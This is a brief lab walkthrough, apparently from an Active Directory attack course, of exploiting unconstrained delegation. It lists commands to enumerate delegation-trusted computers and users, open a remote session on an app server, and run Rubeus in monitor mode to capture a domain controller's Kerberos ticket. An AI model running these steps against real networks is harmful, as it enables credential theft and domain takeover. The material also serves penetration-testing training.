The Unconstrained Delegation happens when the Computer Have Trusted for Delegation flag on where the computer can save the users TGTs in Memory so the computer can impersonate them to get access to another services on the users behave!
Get-DomainComputer -Unconstrained | select samaccountname
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Getting information about the users who have Trusted For Delegation Flag
Get-ADUser -Filter {TrustedForDelegation -eq $True}
Let’s login to APPSRV server
Enter-PSSession -ComputerName dcorp-appsrv
Now Let’s open Rubeus in monitor mode to catch any High Privilege Ticket!
.\\Rubeus.exe monitor /interval:5 /targetuser:mcorp-dc$ /nowrap
As observed Rubeus is waiting for any connection form dcorp-dc$ computer